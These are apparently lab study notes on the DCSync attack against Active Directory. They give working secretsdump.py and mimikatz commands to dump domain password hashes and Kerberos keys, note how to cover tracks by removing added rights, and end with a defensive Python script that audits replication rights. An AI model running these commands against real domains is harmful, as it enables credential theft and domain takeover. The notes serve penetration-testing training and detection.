# Introduction

- DCSync is a technique for stealing the Active Directory password database by using the built-in `Directory Replication Service Remote Protocol`, which is used by Domain Controllers to replicate domain data
- This allows an attacker to mimic a Domain Controller to retrieve user NTLM password hashes
- The crux of the attack is requesting a Domain Controller to replicate passwords via the `DS-Replication-Get-Changes-All` extended right
- If we had certain rights over a user with these replication rights (such as [WriteDacl](https://bloodhound.specterops.io/resources/edges/write-dacl)), we could also add this privilege to a user under our control, execute the DCSync attack, and then remove the privilege to attempt to cover our tracks
- DCSync replication can be performed using tools such as `mimikatz`, `Invoke-DCSync`, and Impacket's `secretsdump.py`

# Enum Groups and Replication Rights

- Use `Get-DomainUser` to view the target user's group membership

```powershell
PS C:\htb> Get-DomainUser -Identity adunn | select samaccountname,objectsid,memberof,useraccountcontrol | fl
```

![[images/Pasted image 20251103204807.png]]

- Use `Get-ObjectAcl` to view the target user's replication rights on the domain object

```powershell
PS C:\htb> $sid = "S-1-5-21-3842939050-3880317879-2865463114-1164"
PS C:\htb> Get-ObjectAcl "DC=inlanefreight,DC=local" -ResolveGUIDs | ? { ($_.ObjectAceType -match 'Replication-Get') } | ? { $_.SecurityIdentifier -match $sid } | select AceQualifier, ObjectDN, ActiveDirectoryRights, SecurityIdentifier, ObjectAceType | fl
```

![[images/Pasted image 20251103204847.png]]

# Performing DCSync from Linux

- Once we confirm that the target user has the necessary replication rights, we can execute the DCSync attack with `secretsdump.py`

```bash
secretsdump.py -outputfile inlanefreight_hashes -just-dc INLANEFREIGHT/[email protected]
```

- If we check the files created using the `-just-dc` flag, we will see that there are three:
    - one containing the NTLM hashes,
    - one that would contain cleartext passwords from the NTDS for any accounts set with [reversible encryption](https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption) enabled, and
    - one containing Kerberos keys

![[images/Pasted image 20251103202912.png]]

- We can also use the `-just-dc-ntlm` flag if we only want NTLM hashes
- Or, we can specify `-just-dc-user <USERNAME>` to only extract data for a specific user

# Performing DCSync from Windows

- We need to run in the context of the user with DCSync privs using `runas.exe`

```cmd
runas /netonly /user:INLANEFREIGHT\adunn powershell
```

![[images/Pasted image 20251103203643.png]]

- This spawns a new PowerShell session running as `adunn`, where we can perform the DCSync attack with `mimikatz`

```cmd
.\mimikatz.exe
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\administrator
```

![[images/Pasted image 20251103203853.png]]
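The replication-rights check from the enumeration section above, turned around to the defender's side as an added example (not code from the original notes or from any tool they mention): given ACEs on the domain object in the shape `Get-ObjectAcl` returns, it lists every principal granted a replication extended right that is not in the expected default set, which is how a grant like the one described in the introduction would show up in an audit. The GUID-to-name table and the baseline of expected principals are assumptions to tune per environment, and the ACL below is constructed sample data.

```python
from dataclasses import dataclass

# Schema GUIDs of the extended rights that permit replication; these are the
# names Get-ObjectAcl -ResolveGUIDs shows in ObjectAceType.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
# Principals that hold replication rights by default (assumed baseline; add any
# service accounts your environment deliberately authorises).
EXPECTED_WELL_KNOWN = {"S-1-5-9", "S-1-5-32-544"}  # Enterprise Domain Controllers, Administrators
EXPECTED_DOMAIN_RIDS = {498, 516}                  # Enterprise Read-only DCs, Domain Controllers

@dataclass
class Ace:
    ace_qualifier: str        # "AccessAllowed" or "AccessDenied"
    security_identifier: str  # SID of the trustee
    object_ace_type: str      # GUID of the extended right

def is_expected(sid, domain_sid):
    """True if the trustee is one of the baseline principals above."""
    if sid in EXPECTED_WELL_KNOWN:
        return True
    prefix = domain_sid + "-"
    rid = sid[len(prefix):] if sid.startswith(prefix) else ""
    return rid.isdigit() and int(rid) in EXPECTED_DOMAIN_RIDS

def audit_replication_aces(aces, domain_sid):
    """Return (SID, right) for each allow ACE granting a replication right to a
    principal outside the baseline; deny ACEs and other rights are ignored."""
    findings = []
    for ace in aces:
        right = REPLICATION_RIGHTS.get(ace.object_ace_type.lower())
        if right and ace.ace_qualifier == "AccessAllowed" \
                and not is_expected(ace.security_identifier, domain_sid):
            findings.append((ace.security_identifier, right))
    return findings

# Constructed sample ACL for DC=inlanefreight,DC=local: default principals plus
# the adunn SID from the notes above, which has been granted both rights.
DOMAIN_SID = "S-1-5-21-3842939050-3880317879-2865463114"
SAMPLE_ACL = [
    Ace("AccessAllowed", DOMAIN_SID + "-516", "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"),
    Ace("AccessAllowed", "S-1-5-9", "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"),
    Ace("AccessAllowed", DOMAIN_SID + "-1164", "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"),
    Ace("AccessAllowed", DOMAIN_SID + "-1164", "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"),
    Ace("AccessDenied", DOMAIN_SID + "-1201", "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"),
    Ace("AccessAllowed", DOMAIN_SID + "-1201", "00000000-0000-0000-0000-000000000000"),
]
```

`audit_replication_aces(SAMPLE_ACL, DOMAIN_SID)` returns only the two adunn entries; the deny ACE and the unrelated right on the `-1201` SID are skipped. On a real domain, feed it the ACEs of the domain head and review every finding against the change history of that object.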